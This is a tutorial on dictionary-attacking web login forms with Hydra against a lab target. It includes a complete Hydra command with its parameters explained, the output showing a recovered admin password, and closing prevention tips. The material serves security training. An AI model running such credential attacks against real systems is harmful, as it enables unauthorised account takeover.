Automated Brute Forcing on web-based login

 

Brute force attacks work by calculating every possible combination that could make up a password and testing it to see if it is the correct password. As the password’s length increases, the amount of time, on average, to find the correct password increases exponentially. This means short passwords can usually be discovered quite quickly, but longer passwords may take decades [Source : Wiki]

It may be feasible in some situations as computer hardwares are getting faster and faster. A simple brute-force attack would start with one-digit passwords, then two-digit passwords and so on, trying all possible combinations until one works.

A better idea is “dictionary attack” that tries words in a dictionary — or a list of common passwords — instead of all possible passwords. This can be very effective, as many people use such weak and common passwords.

We can use automated tool for Brute forcing web-based login form

Using Hydra to dictionary-attack web-based login forms
Hydra is an online password cracking for dictionary-attacks. It tries lists of user-names and passwords until a successful login is found. It is multi-threaded and can try username/password combinations at a rate of thousands per minute [Source



Hydra can be used to attack many different services including IMAP, SMB, HTTP, VNC, MS-SQL MySQL, SMTP, SSH, and many more

This tool should not be used to attack websites or services where you do not have permission to do so. Use this for legitimate testing purposes only.

An example attack
The Web Security Dojo has various vulnerable applications that you can use to test these techniques. So looking at an example the w3af testing framework has a test login at the following location

http://192.168.1.69/w3af/bruteforce/form_login/

The important parts of the HTML form are:

<form name="input" action="dataReceptor.php" method="post">

Username:

<input type="text" name="user">

  

Password:

<input type="password" name="pass">

If we put in one wrong username and password combination we get:

Bad login, stop bruteforcing me!Bad u/p combination for user: a
So, now we have the information we need to attack this login form, we can use this info to construct a Hydra brute-force attack as follows:

hydra 192.168.1.69 http-form-post "/w3af/bruteforce/form_login/dataReceptor.php:user=^USER^&pass=^PASS^:Bad login" -L users.txt -P pass.txt -t 10 -w 30 -o hydra-http-post-attack.txt

If we break this up

Host = 192.168.1.69

Method = http-form-post

URL = /w3af/bruteforce/form_login/dataReceptor.php

Form parameters = user=^USER^&pass=^PASS^

Failure response = Bad login

Users file = users.txt

Password file = pass.txt

Threads = -t 10

Wait for timeout = -w 30

Output file = -o hydra-http-post-attack.txt

Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text “Bad login”. When we run this attack we get:

Hydra basically iterates through all the username/password combinations, until it gets a response that does not contain the text "Bad login". When we run this attack we get:

 

 

 

Hydra v6.5 (c) 2011 by van Hauser / THC and David Maciejak - use allowed only for legal purposes.Hydra (http://www.thc.org/thc-hydra) starting at 2011-08-22 13:11:03

[DATA] 5 tasks, 1 servers, 5 login tries (l:5/p:1), ~1 tries per task

[DATA] attacking service http-post-form on port 80

[STATUS] attack finished for 192.168.1.69 (waiting for children to finish)

[80][www-form] host: 192.168.1.69   login: admin   password: 1234

Hydra (http://www.thc.org/thc-hydra) finished at 2011-08-22 13:11:07

 

As you can see, this was successful and found the user "admin" with password "1234".

Prevention

  1. The first is to implement an account lockout policy. For example, after three failed login attempts, the account is locked out until an administrator unlocks it.
  2. We should use a challenge-response test to prevent automated submissions of the login page. Tools such as the free reCAPTCHA can be used to require the user to enter a word or solve a simple math problem to ensure the user is, in fact, a person.
  3. Any Web application should enforce the use of strong passwords. At a minimum, requiring users to choose passwords of eight letters or more with some complexity (letters and numbers, or requiring one special character) is an excellent defense against brute force attacks.